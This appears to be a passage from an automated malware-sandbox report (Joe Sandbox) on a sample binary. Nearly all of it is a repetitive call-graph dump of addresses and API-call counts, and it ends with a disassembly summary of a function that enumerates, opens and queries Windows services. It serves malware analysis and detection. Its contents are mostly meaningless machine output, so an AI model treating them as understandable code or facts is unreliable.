33320->33321 33322 402285 33321->33322 33323 401d2e 51 API calls 33322->33323 33324 40228c 33323->33324 33325 402141 51 API calls 33324->33325 33326 402292 33325->33326 33327 401d2e 51 API calls 33326->33327 33328 402299 33327->33328 33329 402141 51 API calls 33328->33329 33330 40229f 33329->33330 33331 401d2e 51 API calls 33330->33331 33332 4022a6 33331->33332 33333 402141 51 API calls 33332->33333 33334 4022ac 33333->33334 33335 401d2e 51 API calls 33334->33335 33336 4022b6 33335->33336 33337 402141 51 API calls 33336->33337 33338 4022bc 33337->33338 33339 401d2e 51 API calls 33338->33339 33340 4022c3 33339->33340 33341 402141 51 API calls 33340->33341 33342 4022c9 33341->33342 33343 401d2e 51 API calls 33342->33343 33344 4022d0 33343->33344 33345 402141 51 API calls 33344->33345 33346 4022d6 33345->33346 33347 401d2e 51 API calls 33346->33347 33348 4022dd 33347->33348 33349 402141 51 API calls 33348->33349 33350 4022e3 33349->33350 33351 401d2e 51 API calls 33350->33351 33352 4022ea 33351->33352 33353 402141 51 API calls 33352->33353 33354 4022f0 33353->33354 33355 401d2e 51 API calls 33354->33355 33356 4022f7 33355->33356 33357 402141 51 API calls 33356->33357 33358 402300 33357->33358 33359 401d2e 51 API calls 33358->33359 33360 402307 33359->33360 33361 402141 51 API calls 33360->33361 33362 40230d 33361->33362 33363 401d2e 51 API calls 33362->33363 33364 402314 33363->33364 33365 402141 51 API calls 33364->33365 33366 40231a 33365->33366 33367 401d2e 51 API calls 33366->33367 33368 402321 33367->33368 33369 402141 51 API calls 33368->33369 33370 402327 33369->33370 33371 401d2e 51 API calls 33370->33371 33372 40232e 33371->33372 33373 402141 51 API calls 33372->33373 33374 402334 33373->33374 33375 401d2e 51 API calls 33374->33375 33376 40233b 33375->33376 33377 402141 51 API calls 33376->33377 33378 402341 33377->33378 33379 401d2e 51 API calls 33378->33379 33380 40234b 33379->33380 33381 402141 51 API calls 33380->33381 33382 402351 33381->33382 33383 401d2e 51 API calls 33382->33383 33384 402358 33383->33384 33385 402141 51 API calls 33384->33385 33386 40235e 33385->33386 33387 401d2e 51 API calls 33386->33387 33388 402365 33387->33388 33389 402141 51 API calls 33388->33389 33390 40236b 33389->33390 33391 401d2e 51 API calls 33390->33391 33392 402372 33391->33392 33393 402141 51 API calls 33392->33393 33394 402378 33393->33394 33395 401d2e 51 API calls 33394->33395 33396 40237f 33395->33396 33397 402141 51 API calls 33396->33397 33398 402385 33397->33398 33399 401d2e 51 API calls 33398->33399 33400 40238c 33399->33400 33401 402141 51 API calls 33400->33401 33402 402395 33401->33402 33403 401d2e 51 API calls 33402->33403 33404 40239c 33403->33404 33405 402141 51 API calls 33404->33405 33406 4023a2 33405->33406 33407 401d2e 51 API calls 33406->33407 33408 4023a9 33407->33408 33409 402141 51 API calls 33408->33409 33410 4023af 33409->33410 33411 401d2e 51 API calls 33410->33411 33412 4023b6 33411->33412 33413 402141 51 API calls 33412->33413 33414 4023bc 33413->33414 33415 401d2e 51 API calls 33414->33415 33416 4023c3 33415->33416 33417 402141 51 API calls 33416->33417 33418 4023c9 33417->33418 33419 401d2e 51 API calls 33418->33419 33420 4023d0 33419->33420 33421 402141 51 API calls 33420->33421 33422 4023d6 33421->33422 33423 401d2e 51 API calls 33422->33423 33424 4023e0 33423->33424 33425 402141 51 API calls 33424->33425 33426 4023e6 33425->33426 33427 401d2e 51 API calls 33426->33427 33428 4023ed 33427->33428 33429 402141 51 API calls 33428->33429 33430 4023f3 33429->33430 33431 401d2e 51 API calls 33430->33431 33432 4023fa 33431->33432 33433 402141 51 API calls 33432->33433 33434 402400 33433->33434 33435 401d2e 51 API calls 33434->33435 33436 402407 33435->33436 33437 402141 51 API calls 33436->33437 33438 40240d 33437->33438 33439 401d2e 51 API calls 33438->33439 33440 402414 33439->33440 33441 402141 51 API calls 33440->33441 33442 40241a 33441->33442 33443 401d2e 51 API calls 33442->33443 33444 402421 33443->33444 33445 402141 51 API calls 33444->33445 33446 40242a 33445->33446 33447 401d2e 51 API calls 33446->33447 33448 402431 33447->33448 33449 402141 51 API calls 33448->33449 33450 402437 33449->33450 33451 401d2e 51 API calls 33450->33451 33452 40243e 33451->33452 33453 402141 51 API calls 33452->33453 33454 402444 33453->33454 33455 401d2e 51 API calls 33454->33455 33456 40244b 33455->33456 33457 402141 51 API calls 33456->33457 33458 402451 33457->33458 33459 401d2e 51 API calls 33458->33459 33460 402458 33459->33460 33461 402141 51 API calls 33460->33461 33462 40245e 33461->33462 33463 401d2e 51 API calls 33462->33463 33464 402465 33463->33464 33465 402141 51 API calls 33464->33465 33466 40246b 33465->33466 33467 401d2e 51 API calls 33466->33467 33468 402475 33467->33468 33469 402141 51 API calls 33468->33469 33470 40247b 33469->33470 33471 401d2e 51 API calls 33470->33471 33472 402482 33471->33472 33473 402141 51 API calls 33472->33473 33474 402488 33473->33474 33475 401d2e 51 API calls 33474->33475 33476 40248f 33475->33476 33477 402141 51 API calls 33476->33477 33478 402495 33477->33478 33479 401d2e 51 API calls 33478->33479 33480 40249c 33479->33480 33481 402141 51 API calls 33480->33481 33482 4024a2 33481->33482 33483 401d2e 51 API calls 33482->33483 33484 4024a9 33483->33484 33485 402141 51 API calls 33484->33485 33486 4024af 33485->33486 33487 401d2e 51 API calls 33486->33487 33488 4024b6 33487->33488 33489 402141 51 API calls 33488->33489 33490 4024bf 33489->33490 33491 401d2e 51 API calls 33490->33491 33492 4024c6 33491->33492 33493 402141 51 API calls 33492->33493 33494 4024cc 33493->33494 33495 401d2e 51 API calls 33494->33495 33496 4024d3 33495->33496 33497 402141 51 API calls 33496->33497 33498 4024d9 33497->33498 33499 401d2e 51 API calls 33498->33499 33500 4024e0 33499->33500 33501 402141 51 API calls 33500->33501 33502 4024e6 33501->33502 33503 401d2e 51 API calls 33502->33503 33504 4024ed 33503->33504 33505 402141 51 API calls 33504->33505 33506 4024f3 33505->33506 33507 401d2e 51 API calls 33506->33507 33508 4024fa 33507->33508 33509 402141 51 API calls 33508->33509 33510 402500 33509->33510 33511 401d2e 51 API calls 33510->33511 33512 40250a 33511->33512 33513 402141 51 API calls 33512->33513 33514 402510 33513->33514 33515 401d2e 51 API calls 33514->33515 33516 402517 33515->33516 33517 402141 51 API calls 33516->33517 33518 40251d 33517->33518 33519 401d2e 51 API calls 33518->33519 33520 402524 33519->33520 33521 402141 51 API calls 33520->33521 33522 40252a 33521->33522 33523 401d2e 51 API calls 33522->33523 33524 402531 33523->33524 33525 402141 51 API calls 33524->33525 33526 402537 33525->33526 33527 401d2e 51 API calls 33526->33527 33528 40253e 33527->33528 33529 402141 51 API calls 33528->33529 33530 402544 33529->33530 33531 401d2e 51 API calls 33530->33531 33532 40254b 33531->33532 33533 402141 51 API calls 33532->33533 33534 402554 33533->33534 33535 401d2e 51 API calls 33534->33535 33536 40255b 33535->33536 33537 402141 51 API calls 33536->33537 33538 402561 33537->33538 33539 401d2e 51 API calls 33538->33539 33540 402568 33539->33540 33541 402141 51 API calls 33540->33541 33542 40256e 33541->33542 33543 401d2e 51 API calls 33542->33543 33544 402575 33543->33544 33545 402141 51 API calls 33544->33545 33546 40257b 33545->33546 33547 401d2e 51 API calls 33546->33547 33548 402582 33547->33548 33549 402141 51 API calls 33548->33549 33550 402588 33549->33550 33551 401d2e 51 API calls 33550->33551 33552 40258f 33551->33552 33553 402141 51 API calls 33552->33553 33554 402595 33553->33554 33555 401d2e 51 API calls 33554->33555 33556 40259f 33555->33556 33557 402141 51 API calls 33556->33557 33558 4025a5 33557->33558 33559 401d2e 51 API calls 33558->33559 33560 4025ac 33559->33560 33561 402141 51 API calls 33560->33561 33562 4025b2 33561->33562 33563 401d2e 51 API calls 33562->33563 33564 4025b9 33563->33564 33565 402141 51 API calls 33564->33565 33566 4025bf 33565->33566 33567 401d2e 51 API calls 33566->33567 33568 4025c6 33567->33568 33569 402141 51 API calls 33568->33569 33570 4025cc 33569->33570 33571 401d2e 51 API calls 33570->33571 33572 4025d3 33571->33572 33573 402141 51 API calls 33572->33573 33574 4025d9 33573->33574 33575 401d2e 51 API calls 33574->33575 33576 4025e0 33575->33576 33577 402141 51 API calls 33576->33577 33578 4025e9 33577->33578 33579 401d2e 51 API calls 33578->33579 33580 4025f0 33579->33580 33581 402141 51 API calls 33580->33581 33582 4025f6 33581->33582 33583 401d2e 51 API calls 33582->33583 33584 4025fd 33583->33584 33585 402141 51 API calls 33584->33585 33586 402603 33585->33586 33587 401d2e 51 API calls 33586->33587 33588 40260a 33587->33588 33589 402141 51 API calls 33588->33589 33590 402610 33589->33590 33591 401d2e 51 API calls 33590->33591 33592 402617 33591->33592 33593 402141 51 API calls 33592->33593 33594 40261d 33593->33594 33595 401d2e 51 API calls 33594->33595 33596 402624 33595->33596 33597 402141 51 API calls 33596->33597 33598 40262a 33597->33598 33599 401d2e 51 API calls 33598->33599 33600 402634 33599->33600 33601 402141 51 API calls 33600->33601 33602 40263a 33601->33602 33603 401d2e 51 API calls 33602->33603 33604 402641 33603->33604 33605 402141 51 API calls 33604->33605 33606 402647 33605->33606 33607 401d2e 51 API calls 33606->33607 33608 40264e 33607->33608 33609 402141 51 API calls 33608->33609 33610 402654 33609->33610 33611 401d2e 51 API calls 33610->33611 33612 40265b 33611->33612 33613 402141 51 API calls 33612->33613 33614 402661 33613->33614 33615 401d2e 51 API calls 33614->33615 33616 402668 33615->33616 33617 402141 51 API calls 33616->33617 33618 40266e 33617->33618 33619 401d2e 51 API calls 33618->33619 33620 402675 33619->33620 33621 402141 51 API calls 33620->33621 33622 40267e 33621->33622 33623 401d2e 51 API calls 33622->33623 33624 402685 33623->33624 33625 402141 51 API calls 33624->33625 33626 40268b 33625->33626 33627 401d2e 51 API calls 33626->33627 33628 402692 33627->33628 33629 402141 51 API calls 33628->33629 33630 402698 33629->33630 33631 401d2e 51 API calls 33630->33631 33632 40269f 33631->33632 33633 402141 51 API calls 33632->33633 33634 4026a5 33633->33634 33635 401d2e 51 API calls 33634->33635 33636 4026ac 33635->33636 33637 402141 51 API calls 33636->33637 33638 4026b2 33637->33638 33639 401d2e 51 API calls 33638->33639 33640 4026b9 33639->33640 33641 402141 51 API calls 33640->33641 33642 4026bf 33641->33642 33643 401d2e 51 API calls 33642->33643 33644 4026c9 33643->33644 33645 402141 51 API calls 33644->33645 33646 4026cf 33645->33646 33647 401d2e 51 API calls 33646->33647 33648 4026d6 33647->33648 33649 402141 51 API calls 33648->33649 33650 4026dc 33649->33650 33651 401d2e 51 API calls 33650->33651 33652 4026e3 33651->33652 33653 402141 51 API calls 33652->33653 33654 4026e9 33653->33654 33655 401d2e 51 API calls 33654->33655 33656 4026f0 33655->33656 33657 402141 51 API calls 33656->33657 33658 4026f6 33657->33658 33659 401d2e 51 API calls 33658->33659 33660 4026fd 33659->33660 33661 402141 51 API calls 33660->33661 33662 402703 33661->33662 33663 401d2e 51 API calls 33662->33663 33664 40270a 33663->33664 33665 402141 51 API calls 33664->33665 33666 402713 33665->33666 33667 401d2e 51 API calls 33666->33667 33668 40271a 33667->33668 33669 402141 51 API calls 33668->33669 33670 402720 33669->33670 33671 401d2e 51 API calls 33670->33671 33672 402727 33671->33672 33673 402141 51 API calls 33672->33673 33674 40272d 33673->33674 33675 401d2e 51 API calls 33674->33675 33676 402734 33675->33676 33677 402141 51 API calls 33676->33677 33678 40273a 33677->33678 33679 401d2e 51 API calls 33678->33679 33680 402741 33679->33680 33681 402141 51 API calls 33680->33681 33682 402747 33681->33682 33683 401d2e 51 API calls 33682->33683 33684 40274e 33683->33684 33685 402141 51 API calls 33684->33685 33686 402754 33685->33686 33687 401d2e 51 API calls 33686->33687 33688 40275e 33687->33688 33689 402141 51 API calls 33688->33689 33690 402764 33689->33690 33691 401d2e 51 API calls 33690->33691 33692 40276b 33691->33692 33693 402141 51 API calls 33692->33693 33694 402771 33693->33694 33695 401d2e 51 API calls 33694->33695 33696 402778 33695->33696 33697 402141 51 API calls 33696->33697 33698 40277e 33697->33698 33699 401d2e 51 API calls 33698->33699 33700 402785 33699->33700 33701 402141 51 API calls 33700->33701 33702 40278b 33701->33702 33703 401d2e 51 API calls 33702->33703 33704 402792 33703->33704 33705 402141 51 API calls 33704->33705 33706 402798 33705->33706 33707 401d2e 51 API calls 33706->33707 33708 40279f 33707->33708 33709 402141 51 API calls 33708->33709 33710 4027a8 33709->33710 33711 401d2e 51 API calls 33710->33711 33712 4027af 33711->33712 33713 402141 51 API calls 33712->33713 33714 4027b5 33713->33714 33715 401d2e 51 API calls 33714->33715 33716 4027bc 33715->33716 33717 402141 51 API calls 33716->33717 33718 4027c2 33717->33718 33719 401d2e 51 API calls 33718->33719 33720 4027c9 33719->33720 33721 402141 51 API calls 33720->33721 33722 4027cf 33721->33722 33723 401d2e 51 API calls 33722->33723 33724 4027d6 33723->33724 33725 402141 51 API calls 33724->33725 33726 4027dc 33725->33726 33727 401d2e 51 API calls 33726->33727 33728 4027e3 33727->33728 33729 402141 51 API calls 33728->33729 33730 4027e9 33729->33730 33730->33295 33732 401d2e 51 API calls 33730->33732 33733 40280f 33732->33733 33734 402141 51 API calls 33733->33734 33735 402815 33734->33735 33736 401d2e 51 API calls 33735->33736 33737 40281c 33736->33737 33738 402141 51 API calls 33737->33738 33739 402822 33738->33739 33740 401d2e 51 API calls 33739->33740 33741 402829 33740->33741 33742 402141 51 API calls 33741->33742 33743 40282f 33742->33743 33744 401d2e 51 API calls 33743->33744 33745 402836 33744->33745 33746 402141 51 API calls 33745->33746 33747 40283c 33746->33747 33748 401d2e 51 API calls 33747->33748 33749 402843 33748->33749 33750 402141 51 API calls 33749->33750 33751 402849 33750->33751 33752 401d2e 51 API calls 33751->33752 33753 402850 33752->33753 33754 402141 51 API calls 33753->33754 33755 402859 33754->33755 33756 401d2e 51 API calls 33755->33756 33757 402860 33756->33757 33758 402141 51 API calls 33757->33758 33759 402866 33758->33759 33760 401d2e 51 API calls 33759->33760 33761 40286d 33760->33761 33762 402141 51 API calls 33761->33762 33763 402873 33762->33763 33764 401d2e 51 API calls 33763->33764 33765 40287a 33764->33765 33766 402141 51 API calls 33765->33766 33767 402880 33766->33767 33768 401d2e 51 API calls 33767->33768 33769 402887 33768->33769 33770 402141 51 API calls 33769->33770 33771 40288d 33770->33771 33772 401d2e 51 API calls 33771->33772 33773 402894 33772->33773 33774 402141 51 API calls 33773->33774 33775 40289a 33774->33775 33776 401d2e 51 API calls 33775->33776 33777 4028a4 33776->33777 33778 402141 51 API calls 33777->33778 33779 4028aa 33778->33779 33780 401d2e 51 API calls 33779->33780 33781 4028b1 33780->33781 33782 402141 51 API calls 33781->33782 33783 4028b7 33782->33783 33784 401d2e 51 API calls 33783->33784 33785 4028be 33784->33785 33786 402141 51 API calls 33785->33786 33787 4028c4 33786->33787 33788 401d2e 51 API calls 33787->33788 33789 4028cb 33788->33789 33790 402141 51 API calls 33789->33790 33791 4028d1 33790->33791 33792 401d2e 51 API calls 33791->33792 33793 4028d8 33792->33793 33794 402141 51 API calls 33793->33794 33795 4028de 33794->33795 33796 401d2e 51 API calls 33795->33796 33797 4028e5 33796->33797 33798 402141 51 API calls 33797->33798 33799 4028ee 33798->33799 33800 401d2e 51 API calls 33799->33800 33801 4028f5 33800->33801 33802 402141 51 API calls 33801->33802 33803 4028fb 33802->33803 33804 401d2e 51 API calls 33803->33804 33805 402902 33804->33805 33806 402141 51 API calls 33805->33806 33807 402908 33806->33807 33808 401d2e 51 API calls 33807->33808 33809 40290f 33808->33809 33810 402141 51 API calls 33809->33810 33811 402915 33810->33811 33812 401d2e 51 API calls 33811->33812 33813 40291c 33812->33813 33814 402141 51 API calls 33813->33814 33815 402922 33814->33815 33816 401d2e 51 API calls 33815->33816 33817 402929 33816->33817 33818 402141 51 API calls 33817->33818 33819 40292f 33818->33819 33820 401d2e 51 API calls 33819->33820 33821 402939 33820->33821 33822 402141 51 API calls 33821->33822 33823 40293f 33822->33823 33824 401d2e 51 API calls 33823->33824 33825 402946 33824->33825 33826 402141 51 API calls 33825->33826 33827 40294c 33826->33827 33828 401d2e 51 API calls 33827->33828 33829 402953 33828->33829 33830 402141 51 API calls 33829->33830 33831 402959 33830->33831 33832 401d2e 51 API calls 33831->33832 33833 402960 33832->33833 33834 402141 51 API calls 33833->33834 33835 402966 33834->33835 33836 401d2e 51 API calls 33835->33836 33837 40296d 33836->33837 33838 402141 51 API calls 33837->33838 33839 402973 33838->33839 33840 401d2e 51 API calls 33839->33840 33841 40297a 33840->33841 33842 402141 51 API calls 33841->33842 33843 402983 33842->33843 33844 401d2e 51 API calls 33843->33844 33845 40298a 33844->33845 33846 402141 51 API calls 33845->33846 33847 402990 33846->33847 33848 401d2e 51 API calls 33847->33848 33849 402997 33848->33849 33850 402141 51 API calls 33849->33850 33851 40299d 33850->33851 33852 401d2e 51 API calls 33851->33852 33853 4029a4 33852->33853 33854 402141 51 API calls 33853->33854 33855 4029aa 33854->33855 33856 401d2e 51 API calls 33855->33856 33857 4029b1 33856->33857 33858 402141 51 API calls 33857->33858 33859 4029b7 33858->33859 33860 401d2e 51 API calls 33859->33860 33861 4029be 33860->33861 33862 402141 51 API calls 33861->33862 33863 4029c4 33862->33863 33864 401d2e 51 API calls 33863->33864 33865 4029ce 33864->33865 33866 402141 51 API calls 33865->33866 33867 4029d4 33866->33867 33868 401d2e 51 API calls 33867->33868 33869 4029db 33868->33869 33870 402141 51 API calls 33869->33870 33871 4029e1 33870->33871 33872 401d2e 51 API calls 33871->33872 33873 4029e8 33872->33873 33874 402141 51 API calls 33873->33874 33875 4029ee 33874->33875 33876 401d2e 51 API calls 33875->33876 33877 4029f5 33876->33877 33878 402141 51 API calls 33877->33878 33879 4029fb 33878->33879 33880 401d2e 51 API calls 33879->33880 33881 402a02 33880->33881 33882 402141 51 API calls 33881->33882 33883 402a08 33882->33883 33884 401d2e 51 API calls 33883->33884 33885 402a0f 33884->33885 33886 402141 51 API calls 33885->33886 33887 402a18 33886->33887 33888 401d2e 51 API calls 33887->33888 33889 402a1f 33888->33889 33890 402141 51 API calls 33889->33890 33891 402a25 33890->33891 33892 401d2e 51 API calls 33891->33892 33893 402a2c 33892->33893 33894 402141 51 API calls 33893->33894 33895 402a32 33894->33895 33896 401d2e 51 API calls 33895->33896 33897 402a39 33896->33897 33898 402141 51 API calls 33897->33898 33899 402a3f 33898->33899 33900 401d2e 51 API calls 33899->33900 33901 402a46 33900->33901 33902 402141 51 API calls 33901->33902 33903 402a4c 33902->33903 33904 401d2e 51 API calls 33903->33904 33905 402a53 33904->33905 33906 402141 51 API calls 33905->33906 33907 402a59 33906->33907 33908 401d2e 51 API calls 33907->33908 33909 402a63 33908->33909 33910 402141 51 API calls 33909->33910 33911 402a69 33910->33911 33912 401d2e 51 API calls 33911->33912 33913 402a70 33912->33913 33914 402141 51 API calls 33913->33914 33915 402a76 33914->33915 33916 401d2e 51 API calls 33915->33916 33917 402a7d 33916->33917 33918 402141 51 API calls 33917->33918 33919 402a83 33918->33919 33920 401d2e 51 API calls 33919->33920 33921 402a8a 33920->33921 33922 402141 51 API calls 33921->33922 33923 402a90 33922->33923 33924 401d2e 51 API calls 33923->33924 33925 402a97 33924->33925 33926 402141 51 API calls 33925->33926 33927 402a9d 33926->33927 33928 401d2e 51 API calls 33927->33928 33929 402aa4 33928->33929 33930 402141 51 API calls 33929->33930 33931 402aad 33930->33931 33932 401d2e 51 API calls 33931->33932 33933 402ab4 33932->33933 33934 402141 51 API calls 33933->33934 33935 402aba 33934->33935 33936 401d2e 51 API calls 33935->33936 33937 402ac1 33936->33937 33938 402141 51 API calls 33937->33938 35171 401a28 __EH_prolog 35170->35171 35190 401892 35171->35190 35173 401a58 35173->33235 35177 401925 35176->35177 35178 401936 35176->35178 35199 401878 37 API calls 35177->35199 35180 401c87 35178->35180 35181 401c91 __EH_prolog 35180->35181 35182 401cb8 35181->35182 35184 40199c 37 API calls 35181->35184 35200 4018b6 35182->35200 35184->35182 35185 401cc3 35185->33244 35187 401941 35186->35187 35188 40194e 35187->35188 35206 42147b 35187->35206 35188->33235 35191 4018b0 35190->35191 35192 4018a8 35190->35192 35191->35173 35194 40199c 35191->35194 35198 42044e EnterCriticalSection std::locale::facet::_Incref 35192->35198 35195 4019af 35194->35195 35196 40191e 37 API calls 35195->35196 35197 4019d0 35196->35197 35197->35173 35198->35191 35199->35178 35201 4018c5 35200->35201 35202 4018cd 35200->35202 35205 421d28 LeaveCriticalSection 35201->35205 35202->35185 35204 42045e 35204->35185 35205->35204 35208 421485 __EH_prolog 35206->35208 35207 42149c std::runtime_error::~runtime_error 35235 412f8a 36 API calls 2 library calls 35207->35235 35208->35207 35211 4214f6 35208->35211 35212 4214da 35208->35212 35210 421609 35210->35188 35231 401a7a 37 API calls 3 library calls 35211->35231 35223 4228af 35212->35223 35215 421504 35232 421363 37 API calls 2 library calls 35215->35232 35217 4215b4 35217->35207 35218 4228af 48 API calls 35217->35218 35219 4215c6 35218->35219 35219->35207 35220 42150f 35220->35207 35220->35217 35233 422863 48 API calls 2 library calls 35220->35233 35234 421152 37 API calls 2 library calls 35220->35234 35224 4228bb std::_Locinfo::_Getctype 35223->35224 35236 41ccfb 35224->35236 35226 4228c4 35227 4228ce 35226->35227 35242 417b7f 35226->35242 35254 4228ff LeaveCriticalSection LeaveCriticalSection ctype 35227->35254 35230 4228f3 std::_Locinfo::_Getctype 35230->35207 35231->35215 35232->35220 35233->35220 35234->35220 35235->35210 35237 41cd08 35236->35237 35238 41cd1f EnterCriticalSection 35236->35238 35237->35238 35239 41cd0f 35237->35239 35238->35226 35255 4148f8 36 API calls __lock 35239->35255 35241 41cd1d 35241->35226 35246 417b95 _write_multi_char 35242->35246 35251 417c1c 35242->35251 35243 417bf3 35244 417c61 35243->35244 35245 417bfd 35243->35245 35259 41cb1f 44 API calls 3 library calls 35244->35259 35248 417c14 35245->35248 35252 417c21 35245->35252 35246->35243 35246->35251 35256 41cbca 36 API calls __getbuf 35246->35256 35257 41cb1f 44 API calls 3 library calls 35248->35257 35251->35227 35252->35251 35258 41c8a6 40 API calls 3 library calls 35252->35258 35254->35230 35255->35241 35256->35243 35257->35251 35258->35251 35259->35251 35261 401f17 __EH_prolog 35260->35261 35262 401a1e 38 API calls 35261->35262 35263 401f33 35262->35263 35264 401939 49 API calls 35263->35264 35265 401f50 35263->35265 35264->35265 35266 40191e 37 API calls 35265->35266 35267 401f94 35266->35267 35268 401c87 38 API calls 35267->35268 35269 401fa0 35268->35269 35269->33247 35271 402052 ctype 35270->35271 35272 402074 35271->35272 35273 402056 35271->35273 35277 401cd0 35272->35277 35275 401fb3 ctype 37 API calls 35273->35275 35276 402072 std::runtime_error::~runtime_error std::_Locinfo::_Getctype 35275->35276 35276->33252 35278 401ce2 35277->35278 35279 401cdd 35277->35279 35282 401cf2 std::runtime_error::~runtime_error 35278->35282 35283 401ae6 35278->35283 35287 4205cc 37 API calls 2 library calls 35279->35287 35282->35276 35284 401af0 __EH_prolog 35283->35284 35288 424440 36 API calls __getbuf 35284->35288 35286 401b40 std::runtime_error::~runtime_error std::_Locinfo::_Getctype 35286->35282 35287->35278 35288->35286 35290 403b94 std::runtime_error::~runtime_error 35289->35290 35291 401fb3 ctype 37 API calls 35290->35291 35292 403ba3 35291->35292 35293 403bc6 35292->35293 35294 403bd2 _strlen 35293->35294 35297 4020b1 35294->35297 35296 403bdf 35296->33259 35298 4020c1 ctype 35297->35298 35299 4020e3 35298->35299 35300 4020c5 35298->35300 35301 4020f5 35299->35301 35307 4205cc 37 API calls 2 library calls 35299->35307 35306 401e78 37 API calls 3 library calls 35300->35306 35303 401cd0 ctype 37 API calls 35301->35303 35305 4020e1 std::runtime_error::~runtime_error std::_Locinfo::_Getctype 35301->35305 35303->35305 35305->35296 35306->35305 35307->35301 35309->33269 35310->33271 35316 4016af 35311->35316 35312 4016c8 35312->33275 35316->35312 35317 4122b3 35316->35317 35331 4015f9 35316->35331 35335 40159e 35316->35335 35318 4122bf std::_Locinfo::_Getctype 35317->35318 35339 416254 GetLastError FlsGetValue 35318->35339 35320 4122c9 35321 4122dc 35320->35321 35360 415a16 36 API calls 3 library calls 35320->35360 35324 4122e8 std::_Locinfo::_Getctype 35321->35324 35349 4154d2 58 API calls 6 library calls 35321->35349 35324->35316 35325 41232e _fast_error_exit 35325->35324 35326 412382 35325->35326 35327 412247 __getbuf 36 API calls 35325->35327 35329 4123a7 35326->35329 35361 4154d2 58 API calls 6 library calls 35326->35361 35327->35326 35329->35324 35350 412a4d 35329->35350 35332 401606 _fast_error_exit 35331->35332 35333 412247 __getbuf 36 API calls 35332->35333 35334 40161c ctype 35333->35334 35334->35316 35336 4015ab _fast_error_exit _strlen 35335->35336 35337 412247 __getbuf 36 API calls 35336->35337 35338 4015c1 ctype 35337->35338 35338->35316 35340 416270 35339->35340 35341 4162b9 SetLastError 35339->35341 35362 4146ea 35340->35362 35341->35320 35343 41627c 35344 4162b1 35343->35344 35345 416284 FlsSetValue 35343->35345 35369 412d15 36 API calls _fast_error_exit 35344->35369 35345->35344 35346 416295 GetCurrentThreadId 35345->35346 35346->35341 35348 4162b8 35348->35341 35349->35325 35352 412a59 std::_Locinfo::_Getctype 35350->35352 35351 412a95 35353 412aaa RtlFreeHeap 35351->35353 35354 412ab8 std::_Locinfo::_Getctype 35351->35354 35352->35351 35352->35354 35373 4148f8 36 API calls __lock 35352->35373 35353->35354 35354->35324 35356 412a70 __mtdeletelocks 35357 412a8a 35356->35357 35374 414a07 VirtualFree VirtualFree HeapFree __shift 35356->35374 35375 412aa0 LeaveCriticalSection std::_Locinfo::_Getctype 35357->35375 35360->35321 35361->35329 35368 4146f6 __getbuf ctype std::_Locinfo::_Getctype 35362->35368 35363 414763 RtlAllocateHeap 35363->35368 35365 41478f std::_Locinfo::_Getctype 35365->35343 35368->35363 35368->35365 35370 4148f8 36 API calls __lock 35368->35370 35371 4151bb 5 API calls __getbuf 35368->35371 35372 414794 LeaveCriticalSection std::_Locinfo::_Getctype 35368->35372 35369->35348 35370->35368 35371->35368 35372->35368 35373->35356 35374->35357 35375->35351 35376 41cc3e 35377 41cc4b 35376->35377 35378 4146ea _TranslateName 36 API calls 35377->35378 35379 41cc65 35378->35379 35380 4146ea _TranslateName 36 API calls 35379->35380 35381 41cc7e 35379->35381 35380->35381

                                                                              Executed Functions

                                                                              Function 0222DE9C, Relevance: 13.6, APIs: 9, Instructions: 120serviceCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1128 222de9c-222deca EnumServicesStatusExW 1129 222ded0-222dedb GetLastError 1128->1129 1130 222dfca-222dfd1 1128->1130 1129->1130 1131 222dee1-222def1 call 22214f2 1129->1131 1134 222def7-222df15 EnumServicesStatusExW 1131->1134 1135 222dfc9 1131->1135 1136 222dfb5 1134->1136 1137 222df1b-222df37 GetTickCount 1134->1137 1135->1130 1138 222dfb8-222dfc2 call 2221532 1136->1138 1139 222df3a-222df3c 1137->1139 1138->1135 1146 222dfc4-222dfc7 1138->1146 1139->1138 1141 222df3e-222df50 OpenServiceW 1139->1141 1143 222df52-222df65 QueryServiceConfig2W 1141->1143 1144 222dfa9-222dfb1 1141->1144 1147 222dfa0-222dfa3 CloseServiceHandle 1143->1147 1148 222df67-222df70 GetLastError 1143->1148 1144->1139 1145 222dfb3 1144->1145 1145->1138 1146->1135 1147->1144 1148->1147 1149 222df72-222df7e call 22214f2 1148->1149 1149->1147 1152 222df80-222df97 QueryServiceConfig2W 1149->1152 1152->1147 1153 222df99-222df9b call 2221532 1152->1153 1153->1147
                                                                              APIs
                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,0222E1D6,?,00000000,00000000,00000000,00000000), ref: 0222DEC2
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,0222E1D6), ref: 0222DED0
                                                                                • Part of subcall function 022214F2: GetProcessHeap.KERNEL32(00000008,02230000,02221A84,?,?,?,?,?,?,?,022210F5), ref: 022214F5
                                                                                • Part of subcall function 022214F2: RtlAllocateHeap.NTDLL(00000000), ref: 022214FC
                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,0222E1D6,0222E1D6,?,00000000,00000000,00000000), ref: 0222DF0D
                                                                              • GetTickCount.KERNEL32 ref: 0222DF1B
                                                                              • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,0222E1D6), ref: 0222DF45
                                                                              • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0222E1D6), ref: 0222DF5D
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,0222E1D6), ref: 0222DF67
                                                                              • QueryServiceConfig2W.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0222E1D6), ref: 0222DF8D
                                                                                • Part of subcall function 02221532: GetProcessHeap.KERNEL32(00000000,00000000,022213F0), ref: 02221535
                                                                                • Part of subcall function 02221532: HeapFree.KERNEL32(00000000), ref: 0222153C
                                                                              • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,0222E1D6), ref: 0222DFA3
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapService$Config2EnumErrorLastProcessQueryServicesStatus$AllocateCloseCountFreeHandleOpenTick
                                                                              • String ID:
                                                                              • API String ID: 2166652104-0
